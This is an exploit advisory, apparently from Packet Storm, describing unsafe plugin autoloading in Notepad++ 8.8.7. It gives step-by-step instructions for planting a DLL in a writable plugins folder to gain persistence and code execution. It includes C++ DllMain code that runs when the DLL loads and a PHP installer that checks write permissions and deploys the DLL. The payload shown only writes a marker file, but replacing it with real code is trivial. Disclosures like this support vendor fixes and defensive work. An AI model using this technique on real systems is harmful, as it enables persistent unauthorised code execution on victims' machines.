Share
## https://sploitus.com/exploit?id=PACKETSTORM:212160
=============================================================================================================================================
    | # Title     : Notepad++ 8.8.7 Unsafe Plugin Persistence AutoLoad                                                                          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://notepad-plus-plus.org/downloads/                                                                                    |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/211934/ 
    
    [+] Summary : 
    
    Notepad++ automatically loads any DLL placed inside its `plugins` directory
    without performing validation or signature checks. If the directory permissions
    allow write access to unprivileged users, this behavior enables persistence and
    arbitrary code execution whenever Notepad++ is started.
    
    This PoC demonstrates the issue safely by loading a benign DLL that only writes
    a text file to `C:\Users\Public\npp_poc_loaded.txt` upon being loaded.  
    No harmful behavior is performed.
    
    
    [+] Usage
    ----------
    Below is the exact methodology demonstrating the vulnerability endโ€‘toโ€‘end.
    
    1. **Locate Plugin Directory**
       The attacker checks for:
           %PROGRAMFILES%\Notepad++\plugins\
    
    2. **Check Write Permissions**
       If write access is available (weak ACL), the vulnerability is exploitable.
    
    3. **Create Malicious Plugin Folder**
       Create a folder such as:
           plugins\poc_plugin\
    
    4. **Place Autoโ€‘Loaded DLL**
       Inside the folder, place:
           poc_plugin.dll
    
       Notepad++ auto-loads any DLL with the same name as the folder name.
    
    5. **Trigger Execution**
       Once Notepad++ starts, it loads the DLL automatically.
    
    6. **PoC Verification**
       Instead of malicious code, our DLL only writes:
           C:\Users\Public\npp_poc_loaded.txt
    
       This provides **irrefutable evidence** that auto-loading executed successfully.
    
    This method mirrors how an actual attacker would exploit the issue โ€” but the
    payload here is completely benign and safe.
    
    -------------------------------------------------------------------------------
    ###  PoC DLL Code (C++)
    
    #include <windows.h>
    #include <fstream>
    
    BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID reserved) {
        if (reason == DLL_PROCESS_ATTACH) {
            std::ofstream f("C:\\Users\\Public\\npp_poc_loaded.txt");
            f << "[+] PoC Loaded Successfully by Notepad++\n";
            f.close();
        }
        return TRUE;
    }
    
    Compile:
        cl /LD poc_plugin.cpp /link /OUT:poc_plugin.dll
    
    -------------------------------------------------------------------------------
    ### PoC Installer (PHP)
    
    <?php
    
    function get_plugin_dir() {
        $pf = getenv("PROGRAMFILES");
        return $pf . "\\Notepad++\\plugins\\";
    }
    
    function check_write($dir) {
        $t = $dir . "test_" . uniqid() . ".tmp";
        if (@file_put_contents($t, "x") !== false) { unlink($t); return true; }
        return false;
    }
    
    function install_poc() {
        $dir = get_plugin_dir();
    
        echo "[+] Checking: $dir\n";
        if (!is_dir($dir)) { echo "[!] Notepad++ not installed.\n"; return; }
    
        if (!check_write($dir)) {
            echo "[!] Directory NOT writable. System NOT vulnerable.\n";
            return;
        }
    
        echo "[+] Directory writable โ†’ Vulnerable.\n";
    
        $folder = $dir . "poc_plugin\\";
        if (!is_dir($folder)) mkdir($folder);
    
        $dllSrc = __DIR__ . "\\poc_plugin.dll";
        $dllDst = $folder . "poc_plugin.dll";
    
        if (!copy($dllSrc, $dllDst)) {
            echo "[!] Failed to deploy PoC.\n";
            return;
        }
    
        echo "[+] PoC installed.\n";
        echo "[*] Open Notepad++ to trigger auto-loading.\n";
    }
    
    install_poc();
    
    -------------------------------------------------------------------------------
    ### Execution
    1. Place:
           poc.php
           poc_plugin.dll
       in the same directory.
    
    2. Run:
           php poc.php
    
    3. Launch Notepad++.
    
    4. Evidence will appear:
           C:\Users\Public\npp_poc_loaded.txt
    
    If this file exists, Notepad++ executed the DLL automatically.
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================